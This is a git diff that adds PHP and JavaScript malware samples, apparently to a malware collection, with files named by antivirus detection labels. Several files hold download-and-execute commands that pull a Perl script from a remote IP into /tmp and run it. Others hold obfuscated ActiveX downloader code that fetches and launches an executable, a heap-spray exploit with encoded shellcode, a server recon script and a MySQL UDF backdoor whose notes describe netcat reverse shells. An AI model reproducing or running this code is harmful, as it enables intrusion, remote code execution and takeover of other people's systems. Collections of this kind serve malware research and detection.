    + + + +\r\nReply-To: + $replyto\r\n"; + + $header .= "MIME-Version: 1.0\r\n"; + + $header .= "Content-Type: text/$contenttype\r\n"; + + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + + $header .= "$message\r\n"; + + mail($to, $subject, "", $header); + + print "ok
    "; + + flush(); + + + } + + } + + + +} + + + +?> +

    PHP Mailer
    + © JAMO BIZZ Connection 2007, July.
    +

    +alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); + ";} +?> + + + + diff --git a/PHP/Trojan-Downloader.PHP.Mulitcom.d b/PHP/Trojan-Downloader.PHP.Mulitcom.d new file mode 100644 index 00000000..073db89a --- /dev/null +++ b/PHP/Trojan-Downloader.PHP.Mulitcom.d @@ -0,0 +1,90 @@ +nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@passthru('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@passthru('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@passthru('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@passthru('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@passthru('cd /tmp;lwp-downloadhttp://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@passthru('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@passthru('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@system('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@popen('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +@shell_exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*'); +?> += 4 && $len <=6) { +return sprintf("%0.2f Kb", $number/1024); } +if($len >= 7 && $len <=9) { +return sprintf("%0.2f Mb", $number/1024/1024); } +return sprintf("%0.2f Gb", $number/1024/1024/1024); } + +echo "Osirys
    "; +$un = @php_uname(); +$id1 = system(id); +$pwd1 = @getcwd(); +$free1= diskfreespace($pwd1); +$free = ConvertBytes(diskfreespace($pwd1)); +if (!$free) {$free = 0;} +$all1= disk_total_space($pwd1); +$all = ConvertBytes(disk_total_space($pwd1)); +if (!$all) {$all = 0;} +$used = ConvertBytes($all1-$free1); +$os = @PHP_OS; + +echo "0sirys was here ..
    "; +echo "uname -a: $un
    "; +echo "os: $os
    "; +echo "id: $id1
    "; +echo "free: $free
    "; +echo "used: $used
    "; +echo "total: $all
    "; +exit; diff --git a/PHP/Trojan-Downloader.PHP.Small.c b/PHP/Trojan-Downloader.PHP.Small.c new file mode 100644 index 00000000..fb8ff717 --- /dev/null +++ b/PHP/Trojan-Downloader.PHP.Small.c @@ -0,0 +1 @@ +eval(unescape('%76%61%72%20%65%78%65%75%72%6c%3d%75%72%6c%3b')); function CreateO(o,n){ eval(unescape('%76%61%72%20%72%3d%6e%75%6c%6c%3b')); eval(unescape('%74%72%79%7b%72%3d%6f%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%29%7d%63%61%74%63%68%28%65%29%7b%7d')); eval(unescape('%69%66%28%21%72%29%7b%74%72%79%7b%72%3d%6f%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%2c%22%22%29%7d%63%61%74%63%68%28%65%29%7b%7d%7d')); eval(unescape('%69%66%28%21%72%29%7b%74%72%79%7b%72%3d%6f%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%2c%22%22%2c%22%22%29%7d%63%61%74%63%68%28%65%29%7b%7d%7d')); eval(unescape('%69%66%28%21%72%29%7b%74%72%79%7b%72%3d%6f%2e%47%65%74%4f%62%6a%65%63%74%28%22%22%2c%6e%29%7d%63%61%74%63%68%28%65%29%7b%7d%7d')); eval(unescape('%69%66%28%21%72%29%7b%74%72%79%7b%72%3d%6f%2e%47%65%74%4f%62%6a%65%63%74%28%6e%2c%22%22%29%7d%63%61%74%63%68%28%65%29%7b%7d%7d')); eval(unescape('%69%66%28%21%72%29%7b%74%72%79%7b%72%3d%6f%2e%47%65%74%4f%62%6a%65%63%74%28%6e%29%7d%63%61%74%63%68%28%65%29%7b%7d%7d')); return(r); } function Go(a){ eval(unescape('%66%6e%61%6d%65%3d%22%66%69%6c%65%2e%65%78%65%22%3b')); eval(unescape('%76%61%72%20%66%73%6f%3d%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%22%53%63%72%69%70%74%69%6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74%22%2c%22%22%29')); eval(unescape('%76%61%72%20%73%61%70%3d%43%72%65%61%74%65%4f%28%61%2c%22%53%68%65%6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b')); eval(unescape('%76%61%72%20%78%3d%43%72%65%61%74%65%4f%28%61%2c%22%41%44%4f%44%42%2e%53%74%72%65%61%6d%22%29%3b')); eval(unescape('%76%61%72%20%6e%6c%3d%6e%75%6c%6c%3b')); eval(unescape('%66%6e%61%6d%65%3d%66%73%6f%2e%42%75%69%6c%64%50%61%74%68%28%66%73%6f%2e%47%65%74%53%70%65%63%69%61%6c%46%6f%6c%64%65%72%28%32%29%2c%66%6e%61%6d%65%29%3b')); eval(unescape('%78%2e%4d%6f%64%65%3d%33%3b')); try{eval(unescape('%6e%6c%3d%43%72%65%61%74%65%4f%28%61%2c%22%4d%69%63%72%22%20%22%6f%73%6f%66%74%2e%58%4d%4c%48%22%20%22%54%54%50%22%29%3b%6e%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%65%78%65%75%72%6c%2c%66%61%6c%73%65%29%3b'));} catch(e){try{eval(unescape('%6e%6c%3d%43%72%65%61%74%65%4f%28%61%2c%22%4d%53%58%4d%4c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%6e%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%65%78%65%75%72%6c%2c%66%61%6c%73%65%29%3b'));} catch(e){try{eval(unescape('%6e%6c%3d%43%72%65%61%74%65%4f%28%61%2c%22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%72%58%4d%4c%48%54%54%50%22%29%3b%6e%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%65%78%65%75%72%6c%2c%66%61%6c%73%65%29%3b'));} catch(e){try{eval(unescape('%6e%6c%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%6e%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%65%78%65%75%72%6c%2c%66%61%6c%73%65%29%3b'));} catch(e){eval(unescape('%72%65%74%75%72%6e%20%30%3b'));}}}} eval(unescape('%78%2e%54%79%70%65%3d%31%3b')); eval(unescape('%6e%6c%2e%73%65%6e%64%28%6e%75%6c%6c%29%3b')); eval(unescape('%72%62%3d%6e%6c%2e%72%65%73%70%6f%6e%73%65%42%6f%64%79%3b')); eval(unescape('%78%2e%4f%70%65%6e%28%29%3b')); eval(unescape('%78%2e%57%72%69%74%65%28%72%62%29%3b')); eval(unescape('%78%2e%53%61%76%65%54%6f%66%69%6c%65%28%66%6e%61%6d%65%2c%32%29%3b')); eval(unescape('%73%61%70%2e%53%68%65%6c%6c%45%78%65%63%75%74%65%28%66%6e%61%6d%65%29%3b')); return 1; } function okei_s(){ eval(unescape('%76%61%72%20%69%3d%30%3b')); eval(unescape('%76%61%72%20%74%61%72%67%65%74%3d%6e%65%77%20%41%72%72%61%79%28%27%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36%27%2c%27%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%30%27%2c%27%41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36%27%2c%27%30%30%30%36%46%30%33%33%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%27%2c%27%30%30%30%36%46%30%33%41%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%27%2c%27%36%65%33%32%30%37%30%61%2d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64%63%31%66%61%39%31%64%32%66%63%33%27%2c%27%36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%31%44%2d%41%30%44%38%2d%46%43%46%44%46%33%33%45%38%33%33%43%27%2c%27%37%46%35%42%37%46%36%33%2d%46%30%36%46%2d%34%33%33%31%2d%38%41%32%36%2d%33%33%39%45%30%33%43%30%41%45%33%44%27%2c%27%30%36%37%32%33%45%30%39%2d%46%34%43%32%2d%34%33%63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%30%37%36%36%27%2c%27%36%33%39%46%37%32%35%46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d%38%37%34%38%34%37%36%38%32%30%31%30%27%2c%27%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34%34%66%39%2d%38%33%42%34%2d%34%36%31%34%35%34%43%38%34%42%46%38%27%2c%27%44%30%43%30%37%44%35%36%2d%37%43%36%39%2d%34%33%46%31%2d%42%34%41%30%2d%32%35%46%35%41%31%31%46%41%42%31%39%27%2c%27%45%38%43%43%43%44%44%46%2d%43%41%32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37%43%39%36%32%34%37%36%42%27%2c%6e%75%6c%6c%29%3b')); while(target[i]){ eval(unescape('%76%61%72%20%61%3d%6e%75%6c%6c%3b')); eval(unescape('%61%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b')); a.setAttribute("classid","clsid:"+target[i]); if(a){try{eval(unescape('%76%61%72%20%62%3d%43%72%65%61%74%65%4f%28%61%2c%22%53%68%65%6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b'));if(b){if(Go(a))return 1;}}catch(e){}} i++; } } if(okei_s()) success=1; \ No newline at end of file diff --git a/PHP/Trojan-Downloader.PHP.Small.d b/PHP/Trojan-Downloader.PHP.Small.d new file mode 100644 index 00000000..847ad619 --- /dev/null +++ b/PHP/Trojan-Downloader.PHP.Small.d @@ -0,0 +1 @@ +if(!success){ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a%44%43%45%32%46%38%42%31%2d%41%35%32%30%2d%31%31%44%34%2d%38%46%44%30%2d%30%30%44%30%42%37%37%33%30%32%37%37%27%20%69%64%3d%27%74%61%72%67%65%74%31%27%3e%3c%2f%6f%62%6a%65%63%74%3e%22%29%3b')); eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a%39%44%33%39%32%32%33%45%2d%41%45%38%45%2d%31%31%44%34%2d%38%46%44%33%2d%30%30%44%30%42%37%37%33%30%32%37%37%27%20%69%64%3d%27%74%61%72%67%65%74%32%27%3e%3c%2f%6f%62%6a%65%63%74%3e%22%29%3b')); eval(unescape('%76%61%72%20%73%68%65%6c%6c%63%6f%64%65%3d%75%6e%65%73%63%61%70%65%28%73%68%65%6c%6c%63%6f%2b%27%25%75%33%30%33%31%27%29%3b')); bigblock=unescape("%u9090%u9090"); slackspace=20+shellcode.length while(bigblock.length +x=unescape("%PuP9P0P9S0M%MuM9M0S9I0M%SuS1I8I6PA@%PuP6I4@5PBS%@uM0@3M8IBI%MuI4@0S8SBS%PuM8MBM3S0@%@uI1P8M4S0S%MuP5@8P0S5M%@uS0M0P0@1@%Mu@3S3I0S0P%MuP8M9@DI2P%IuI8I9S1P0M%MuS0P4M5I0P%Pu@5P0I8@9S%@u@8P9I0I8P%IuI0SCP5P0S%PuSCS0I8M3@%Mu@8I9P2@8M%SuI8S9M0@0P%@uS0M4S4@0@%SuPCS0S8M3P%Su@6M6@0@8S%PuS7S8@3SDS%SuS7ICP0M5S%MuM8MBMFS2M%@uI8M1@DM8P%IuS9S0PCP3S%PuS0@0S0M0@%PuP8M9P0@0M%Su@3I3I1I8S%@uM8@3IDS2I%MuS0I4@CS0I%@uI1M0I8M9M%@uSCS0S8M3P%@uI8I1M0S4@%@uI8@0IC@3I%@uP0S0P0P0P%MuI8S9P0M0P%SuS3S3P1P8S%IuM8P9MCS0I%SuM8S3S0P3I%Mu@0I4PCI3M%@uS8P1@6I6S%PuM8S8SF@B@%@uS7SCI1PE@%SuI8SB@FS4P%IuM8I1SDI3I%PuP7I0@EPBI%@u@0@0P1SEM%@uS6I6P0P0@%@uP3@3P8@BI%PuI8M9P6M6@%IuM4M2M3M2S%Su@CI6M4M2S%MuS0S8S0M2I%IuP6M6@4I2I%PuI3M2P8IBM%Su@3I1I6P6M%IuP4@2P3I2M%SuMC@6P4I2S%@uP1@4I0M2S%MuS6I6@4P2M%IuS3S2S8IBM%SuM3@1S6P6P%MuM4P2M3P2@%SuS6P6@4P2I%Mu@C@3@8S1I%MuP0M1S6M0P%IuM1P3S8S9I%SuI5I3S8S9M%IuS8S9@0M4I%IuI8@9M1@AS%IuP0S4I5MAI%@uP9I0S9I0@%PuM9I0@9P0@%IuP9@0I9S0S%@uS0@fSeIb@%@uI3@3P5SbI%Mu@6P6ScP9I%@u@8@0PbM9P%PuS8S0P0P1S%@uPeMf@3P3P%SuMe@2S4M3I%Pu@ePbPf@aI%PuIeP8S0P5I%Su@fMfSeMcP%@uMfIfIfPfS%SuI8SbP7Pf@%MuMdSfM4PeS%SuIeMfPeIfI%MuI6M4Pe@f@%SuIe@3@aIf@%PuS9Sf@6P4S%@uM4@2MfS3@%MuI9MfM6S4I%PuM6SeIeP7P%IuIe@fM0I3@%SuIe@fSeMb@%@uI6S4IeIfP%@uMbM9@0P3P%IuP6S1M8I7P%Su@e@1IaI1@%IuP0P7S0P3M%PuPe@fS1M1S%SuIePfIeIf@%PuPaSa@6I6@%@uIb@9MeIbI%SuI7S7I8@7P%@uI6P5I1S1I%@uS0M7MeP1@%@uPe@fP1PfP%MuPe@fPeSfI%SuSaSaS6M6M%SuIbP9IeM7P%Iu@cIaM8S7I%SuS1P0@5SfS%Su@0@7P2IdM%@u@eMfI0SdP%SuMeSfIeIfI%SuMa@aP6P6M%Mu@bI9MeM3I%IuI0I0P8@7P%SuM0MfS2P1P%@uI0P7I8@fI%MuIeMfP3@b@%Pu@eIfPeMfI%PuSaPaM6P6M%PuIbP9IfPfS%SuI2IeS8S7I%PuM0Sa@9@6S%@uI0S7M5P7M%MuMeMfI2P9I%Pu@eIfMeSfI%@u@aIaM6@6P%IuSaPfPfSbI%@uIdS7M6IfI%Iu@9@aM2IcS%IuS6@6P1@5I%IuSfP7PaPaM%SuMeI8M0I6M%Su@eIfSeIeM%MuSb@1SeSfS%SuP9PaP6I6M%PuI6M4@cMb@%SuPeSbPaIa@%@uIe@e@8I5@%IuM6P4SbP6I%IuMfM7PbIaM%@u@0M7SbI9M%Pu@eMfM6S4S%@uIeMfIe@fS%PuP8M7PbIfS%Pu@fI5MdS9M%PuM9MfMc@0S%SuI7M8@0M7P%SuSeMfSeMfP%Su@6@6IeIf@%IuSfI3@aMa@%@u@2IaI6M4M%@uI2IfS6IcS%PuI6@6IbMf@%MuIcSfIaIa@%@uM1S0P8S7S%@u@e@f@eMfI%PuMbPfIePfM%SuSaMaI6P4P%Pu@8S5@f@bI%PuPb@6SeSdS%MuIbPaM6I4P%@u@0I7MfM7@%SuPeSfS8IeS%IuSe@fSePfS%SuIaPaIeScM%MuS2S8@cSf@%SuMbM3Me@fI%@uPcP1P9@1@%PuI2I8@8MaS%SuIeSbIaMf@%Iu@8MaP9I7@%SuSeSfSe@fM%PuP9@a@1I0P%PuI6S4Mc@f@%IuPeM3@aIaP%MuMe@eM8S5@%@uI6M4PbI6M%SuPfS7PbMa@%SuMaSf@0P7P%PuMeSfSe@fS%IuM8M5Ie@fI%IuSbP7@eP8@%PuMaIaMe@cP%@uIdMcIcIbM%@uMbScP3I4P%SuM1S0PbMcS%SuScSfI9MaM%IuIbIcPbPfI%MuSaIaS6@4@%MuM8P5SfI3M%IuMb@6SeSaM%SuSbPaM6P4P%SuP0@7@fM7S%IuPeIfMcMc@%SuPe@f@eIfI%PuPeSf@8I5P%IuP9PaS1@0M%Pu@6I4ScIfM%@uSeS7MaSaP%Iu@e@dM8@5S%IuI6@4PbI6S%MuPfS7@bMa@%IuMf@fM0@7@%@u@e@fSe@f@%IuI8I5Pe@f@%@uM6@4M1P0S%IuIf@fMa@aI%Mu@eMeS8I5P%Pu@6@4@b@6S%@uIf@7PbMaM%MuIeSfP0M7S%@u@ePfMePfS%Iu@aIeIe@fM%Mu@bSdMb@4P%Iu@0PeSeIcP%IuM0Me@ePcP%Su@0@e@eScM%PuI0SePeMc@%@uP0M3P6IcS%@uMbS5MeIbP%PuS6M4SbPcP%Iu@0Id@3P5I%SuSbMdI1@8M%@uI0IfI1P0M%@uS6S4IbSa@%MuS6I4I0@3I%IuPe@7@9@2@%PuIbM2M6@4@%@u@bI9IeI3M%@u@9IcI6P4S%@uM6P4MdS3M%Mu@fP1@9IbP%@u@eSc@9@7P%Su@bS9@1IcI%MuS9P9P6I4@%@uIeMc@cMfS%PuPdSc@1ScI%PuMaP6S2P6I%@uM4M2MaSeM%Iu@2PcIePcS%SuPdPc@bI9M%SuMeS0@1@9@%@uPfIfS5P1@%Iu@1IdMdS5S%MuSeS7I9MbI%IuS2P1P2Pe@%Mu@eScSeS2S%PuPaSf@1SdM%@uP1IeP0M4@%IuS1@1IdP4P%MuI9@a@bI1@%@uIbM5S0Pa@%IuP0I4I6P4@%SuPbS5@6P4@%PuMeIcScSbM%@uM8P9M3S2I%Su@eS3P6S4I%Pu@6I4IaP4M%IuSfI3MbI5P%@uP3M2PePc@%IuSe@bM6I4P%IuIeIcM6I4I%MuIbS1@2PaP%@uI2PdSb@2@%MuIePfSeS7P%@uS1PbM0@7P%@uM1M0P1M1S%SuSbPaM1@0I%PuPa@3IbPdS%@uIaS0IaP2P%@u@eSfIa@1@%IuI7P4M6M8M%PuI7P0P7M4@%IuP2Mf@3@aM%IuI6M4@2PfP%MuM7M6S6I5P%@uS6@1M2MeI%@uP7@2I6M5I%SuM3P4@6Mf@%MuP6P3@2Se@%Su@2SfM6IeI%Su@6S4I6M1M%SuP6@1M7@0S%Pu@6PbM6I3M%SuS6IcM2MfI%Mu@6I1P6MfI%@uM2MeM6@4@%IuM6S8I7S0I%IuM0P0@7I0S%@uS0I0S0@0M".replace(/[IPSM@]/g, '')); +tu=unescape("%KuK0FdF04dK%cu40FdF0KdK".replace(/[Fc4Kr]/g, '')); +var memz=parseInt("0RxUdR0ZdU0ZdZ0Udl".replace(/[RUZrl]/g, '')); +while(tu.length<0x40000) tu+=tu; +tu=tu.substring(0,parseInt("0BxX3IfvfIeD4B".replace(/[vXIBD]/g, ''))-x.length); +o=new Array(); for(i=0;i<450;i++) o[i]=tu+x;z=Math.ceil(memz); +eval("z2=kdyo2c2uymke6nNt6.ksNcNryiyp6t6s6[k02]N.NcNrkekaNtyekC6o2nktyr6oylkR2a6n6g2ey(6)k.ylyeynkgyt2hk".replace(/[k2Ny6]/g, '')); + diff --git a/PHP/Trojan-Dropper.PHP.Agent.a b/PHP/Trojan-Dropper.PHP.Agent.a new file mode 100644 index 00000000..151245c8 --- /dev/null +++ b/PHP/Trojan-Dropper.PHP.Agent.a @@ -0,0 +1,156 @@ +Mysql-cmd /c net user abc /add>c:/log.txt! (×îºóµÄ"!"²»ÄÜÊ¡ÂÔ) +2.È÷þÎñÆ÷·´µ¯Shellµ½±¾»ú20082¶Ë¿Ú:ÏÈÔËÐÐnc ¨Clp 20082,ÔÙnc ip 80->Mysql-c- (×îºóµÄ"-"²»ÄÜÊ¡ÂÔ) +3.È÷þÎñÆ÷ÏÂÔØÎļþ:nc ip 80->Mysql-http://www.x.com/door.exe -c mydoor.exe! +×¢Òâ:ºóÃÅÖ»Ðá̽ÒÔ"Mysql-"¿ªÍ·µÄÊý¾Ý°ü,ÕâÑùÊÇΪÁËÕ¼ÓиüÉÙµÄϵͳ×ÊÔ´. +--> +*/ +error_reporting(0); +extract($_POST); +extract($_GET); +$action="mysql"; +$mysql_hostname=$mysql_hostname?$mysql_hostname:"127.0.0.1"; +$mysql_username=$mysql_username?$mysql_username:"root"; +$post_sql=$post_sql?$post_sql:"select state(\"net user\")"; +$mysql_dbname=$mysql_dbname?$mysql_dbname:"mysql"; + +if($install){ + $link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error()); + mysql_select_db($mysql_dbname,$link) or die(mysql_error()); + + @mysql_query("DROP TABLE udf_temp", $link); + //@mysql_query("drop function state", $link); + + + $query="CREATE TABLE udf_temp (udf BLOB);"; + if(!($result=mysql_query($query, $link))) + die('´íÎó:´´½¨ÁÙʱ±íudf_temp³ö´í¡£'.mysql_error()); + else + { + $code=get_code(); + $query="INSERT into udf_temp values (CONVERT($code,CHAR));"; + if(!mysql_query($query, $link)) + { + mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); + die('´íÎó:²åÈëDLLÊý¾Ý³ö´í¡£'.mysql_error()); + } + else + { + $dllname="mysqlDll.dll"; + if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll"; + elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll"; + + if(file_exists($dir)) { + $time=time(); + $dir=str_replace("mysqlDll","mysqlDll_$time",$dir); + $dllname=str_replace("mysqlDll","mysqlDll_$time",$dllname); + } + + $query="SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ; + //echo $query; + if(!mysql_query($query, $link)) + { + //mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); + die("µ¼³öDLLÎļþ³ö´í£º¿ÉÄÜÎÞȨÏÞ»òÕß $dir ÒѾ­´æÔÚ¡£".mysql_error()); + } + else + { + echo 'DLLÒѳɹ¦µÄµ¼³öµ½'.$dir.'
    '; + } + } + mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); + $result=mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error()); + if($result) { + echo "MysqlDoor°²×°³É¹¦£¡
    ·µ»Ø"; + exit(); + } + } + +} + +?> + + +Linx Mysql Door +
    +Host: + + User: + Password: + DB: +    +
    +
    +ÇëÊäÈëSQLÃüÁ
    + +

    + +

    ·µ»ØÐÅÏ¢£º + +
    + + + +
    +-Linx Mysql BackDoor
    +-2007.6.9
    +
    +ÌîдMysqlµÄ¹ÜÀíÔ±ÃÜÂë,µã»÷"×Ô¶¯°²×°MysqlDoor"ºó,½«»áÔÚMysqlÉÏÔö¼Ó"state"º¯Êý,ͬʱÀûÓÃMysql½ø³ÌÔËÐлùÓÚÐá̽µÄºóÃÅ.
    +
    +Óï¾ä²Î¿¼£º
    + Ö´ÐУºselect state("net user");
    + жÔØ£ºdrop function state;
